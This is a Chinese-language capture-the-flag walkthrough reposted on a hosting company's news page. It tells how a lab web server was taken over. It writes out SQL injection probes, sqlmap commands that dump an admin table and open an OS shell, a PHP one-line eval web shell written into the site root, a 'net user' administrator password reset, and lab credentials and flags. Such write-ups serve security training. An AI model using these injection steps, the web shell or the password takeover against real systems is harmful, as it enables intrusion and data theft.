温馨提示×

温馨提示×

您好，登录后才能下订单哦！

密码登录×

忘记密码？

登录注册×

获取短信验证码

其他方式登录

点击登录注册即表示同意《亿速云用户服务条款》

用户登录×

账户密码登录

请使用微信扫描上方二维码

使用帮助

请求超时！

请点击重新获取二维码

CTF主机渗透的方法是什么

发布时间：2022-01-07 16:09:26 来源：亿速云阅读：152 作者：iii 栏目：网络安全

这篇文章主要介绍了CTF主机渗透的方法是什么的相关知识，内容详细易懂，操作简单快捷，具有一定借鉴价值，相信大家阅读完这篇CTF主机渗透的方法是什么文章都会有所收获，下面我们一起来看看吧。

第一步：首先打开连接地址: http://202.0.0.207

第二步：寻找漏洞点，点击页面的时候，我们看到是PHP的网站，以及url中的参数名为cid，那我们可以使用sql注入试试，看是否存在sql注入漏洞

CTF主机渗透的方法是什么

我们使用手工判断方法：

http://202.0.0.207/product.php?cid=3’，页面异常

CTF主机渗透的方法是什么

http://202.0.0.207/product.php?cid=3 and 1=1，正常

CTF主机渗透的方法是什么

http://202.0.0.207/product.php?cid=3 and 1=2，异常

CTF主机渗透的方法是什么

从而判断此处一定存在sql注入漏洞，且参数类型为整型。

这里我们可以使用盲注来手工注入。因为sqlmap也支持盲注类型，所有为了节约时间我们就使用sqlmap来脱库吧！

第二步：使用sqlmap来脱库

sqlmap -u http://202.0.0.207/product.php?cid=3

CTF主机渗透的方法是什么

此参数爆出时间盲注和联合注入攻击可以实现。

接下来我们直接开始跑库吧

sqlmap -u http://202.0.0.207/product.php?cid=3 –dbs

CTF主机渗透的方法是什么

我们选择510cms数据库来爆吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms –tables

CTF主机渗透的方法是什么

再来爆510_admin试试

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns

CTF主机渗透的方法是什么

接下来爆数据

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark –dump

CTF主机渗透的方法是什么

然后我们想要admin用户的密码：8dbdf8221fcf4bd6ac5a48317baa948c，在线MD5解密后得到密码为adminlwphp

CTF主机渗透的方法是什么

第三步：我们接下来就去找后台登录页面了

这里我使用御剑后台扫描器 CTF主机渗透的方法是什么

CTF主机渗透的方法是什么

首先我们还是看登录页面的源码，看是不是有flag，果然如此，在这里拿到一个flag3{d3eac3a68b7d3863cc7bd45ba948195d}

CTF主机渗透的方法是什么

接下来我们使用爆库出来的管理员账户和密码登录：admin/ adminlwphp，登录成功

CTF主机渗透的方法是什么

第四步：胡乱捣腾

进入后台后，现在也只有到处去收集有用信息，看下有没有直接拿flag的地方了。一不小心，突然看到了网站绝对路径C:/www/,那根据前面爆出的sql注入漏洞，我们能不能拿到cmdshell呢？我们接下来尝试一下

sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell

CTF主机渗透的方法是什么

果然拿到了cmdshell，真XX是一个惊喜，那么我们接下就看下现在拥有的系统权限是什么

CTF主机渗透的方法是什么

第五步：一句话木马上传及利用

接下来就直接写入一句话木马了

echo ^<?php @eval($_POST[pass]);?^>>C:/WWW/shell.php

CTF主机渗透的方法是什么

接下来我们上菜刀工具

CTF主机渗透的方法是什么

连接成功

CTF主机渗透的方法是什么

第六步：胡乱捣腾

下面看到这么多页面心头就开始发慌，又得漫山遍野的去收集flag了，

在网站根目录发现flag.php文件，发现flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}

CTF主机渗透的方法是什么

花了10多分钟，再也没有找到flag，那只有想其他的办法了。在configs中找到config.php，这个是数据库的配置文件，我们得到了数据库连接的账户root密码为windpasssql

CTF主机渗透的方法是什么

我们使用菜刀对数据库进行连接

CTF主机渗透的方法是什么

提交后，连接成功

CTF主机渗透的方法是什么

继续看这里有没有flag，又拿到一个flag=flag2{981c05134c56092b83b3e9c9b4116ac1}

CTF主机渗透的方法是什么

我们使用菜刀工具进入虚拟终端，看下目前的权限是什么，需要提权不？结果发现是system权限，

CTF主机渗透的方法是什么

执行命令netstat -an查看3389端口已经开启

CTF主机渗透的方法是什么

et user administrator godun.f

修改管理员密码为godun.f，

CTF主机渗透的方法是什么

然后远程桌面登录远程主机

拿到flag=flag4{e97950cb2dea110c53cb599abc826268}

拿到了4个flag，还有一个不知道藏在哪里，我们还得继续找，找了半天，最后在，C盘的根目录下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}

最后，到此为止，5个flag全部找出来了，接下来我们把5个flag放入答题框

关于“CTF主机渗透的方法是什么”这篇文章的内容就介绍到这里，感谢各位的阅读！相信大家对“CTF主机渗透的方法是什么”知识都有一定的了解，大家如果还想学习更多知识，欢迎关注亿速云行业资讯频道。

向AI问一下细节

推荐阅读：

免责声明：本站发布的内容（图片、视频和文字）以原创、转载和分享为主，文章观点不代表本网站立场，如果涉及侵权请联系站长邮箱：is@yisu.com进行举报，并提供相关证据，一经查实，将立刻删除涉嫌侵权内容。

上一篇新闻：
BGP路由反射器以及大AS之间的邻居建立是怎样的
下一篇新闻：
c++显式栈如何实现递归

猜你喜欢

AI
助
手

产品服务

地区划分

专题活动

帮助支持

关于我们

售后咨询

7*24小时在线电话：400-100-2938

7*24小时在线 QQ：800811969

关注亿速云

亿速云公众号

手机网站二维码